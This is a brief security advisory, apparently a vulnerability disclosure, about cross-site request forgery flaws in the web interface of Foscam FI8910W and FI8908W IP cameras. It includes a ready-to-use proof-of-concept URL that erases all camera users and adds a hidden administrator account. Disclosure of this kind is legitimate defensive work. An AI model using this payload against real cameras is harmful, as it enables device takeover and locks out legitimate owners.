Foscam versions FI8910W and FI8908W with embedded web interface version 2.4.10.3 suffer from multiple cross site request forgery vulnerabilities.
faa635543909b521a4f2185e437bb1f582d530fa5bbfe5788f9e98319cfa8d99
Embedded Web interface version 2.4.10.3 and older of Foscam FI8910W, FI8908W and many others is vulnerable to CSRF attacks.
This allows attacker to perform calls to any CGI API using cached basic server authentication data stored in victims browser.
Details:
For example, the following URL requested by victims browser would wipe all user records and add 'csrf' user with administrator privileges:
http://cameraurl/set_users.cgi?user1=&pwd1=&pri1=2&user2=&pwd2=&pri2=&user3=&pwd3=&pri3=&user4=&pwd4=&pri4=&user5=&pwd5=&pri5=&user6=&pwd6=&pri6=&user7=&pwd7=&pri7=&user8=csrf&pwd8=csrf&pri8=2&next_url=
The CGI API manual for mentioned cameras is available at http://www.foscam.es/descarga/ipcam_cgi_sdk.pdf .